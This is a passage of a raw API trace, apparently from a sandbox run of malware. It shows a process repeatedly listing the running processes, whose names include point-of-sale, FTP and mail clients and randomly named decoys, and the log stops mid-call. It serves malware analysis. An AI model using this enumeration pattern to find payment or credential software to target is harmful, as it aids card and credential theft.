th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0242.320] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0242.321] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0242.436] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0242.438] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0242.440] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0242.441] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0242.443] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0242.445] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0242.447] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0242.453] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0242.455] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0242.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.463] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0242.468] CloseHandle (hObject=0x1b08) returned 1 [0242.469] Sleep (dwMilliseconds=0x64) [0242.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0242.594] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.596] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.600] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.602] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.603] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.609] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.611] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.613] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.615] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.617] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.619] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.675] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.677] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.679] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.681] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.686] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.688] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.690] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.692] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.693] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0242.694] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0242.696] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.697] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.701] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0242.703] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0242.704] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0242.706] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0242.707] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.708] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0242.710] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.711] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.713] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.719] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0242.721] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0242.722] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0242.724] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0242.725] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0242.727] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0242.731] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0242.733] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0242.734] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0242.736] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0242.737] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0242.739] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0242.740] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0242.741] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0242.743] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0242.744] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0242.749] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0242.750] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0242.751] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0242.753] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0242.754] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0242.756] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0242.758] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0242.759] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0242.822] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0242.824] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0242.826] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0242.828] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0242.829] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0242.831] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0242.833] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0242.835] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0242.837] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0242.838] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0242.843] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0242.844] Process32Next 